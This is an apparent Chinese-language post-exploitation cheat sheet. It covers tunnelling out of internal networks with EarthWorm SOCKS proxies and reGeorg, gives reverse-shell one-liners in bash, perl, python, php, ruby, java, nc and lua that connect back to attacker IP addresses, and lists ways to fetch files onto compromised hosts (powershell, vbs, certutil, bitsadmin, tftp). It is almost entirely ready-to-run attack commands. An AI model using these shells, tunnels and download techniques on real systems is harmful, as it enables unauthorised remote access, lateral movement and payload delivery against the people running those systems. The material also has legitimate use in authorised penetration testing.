@label:内网跨边界代理穿透
EW
正向 SOCKS v5 服务器:
./ew -s ssocksd -l 1080
反弹 SOCKS v5 服务器: a) 先在一台具有公网 ip 的主机A上运行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
多级级联
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
lcx_tran 的用法
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
lcx_listen、lcx_slave 的用法
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
“三级级联”的本地SOCKS测试用例以供参考
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite
使用说明:http://rootkiter.com/Termite/README.txt
@label:代理脚本
reGeorg :https://github.com/sensepost/reGeorg
@label:shell反弹
bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
nc
#使用-e
nc -e /bin/sh 223.8.200.234 1234
#不使用-e
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
@label:内网文件的传输和下载
wput
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -O 1.rar
ariac2(需安装)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
powershell
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file","C:%homepath%file")
vbs脚本
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with
执行 :cscript test.vbs
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
执行:perl test.pl
Python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
执行:python test.py
Ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
执行:ruby test.rb
PHP
<?php
$url = 'http://www.example.com/file';
$path = '/path/to/file';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>
执行:php test.php
NC attacker
cat file | nc -l 1234
target
nc host_ip 1234 > file
FTP
ftp 127.0.0.1 username password get file exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Window 文件共享
net use x: \127.0.0.1\share /user:example.comuserID myPassword
SCP 本地到远程
scp file user@host.com:/tmp
远程到本地
scp user@host.com:/tmp file
rsync 远程rsync服务器中拷贝文件到本地机
rsync -av root@192.168.78.192::www /databack
本地机器拷贝文件到远程rsync服务器
rsync -av /databack root@192.168.78.192::www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file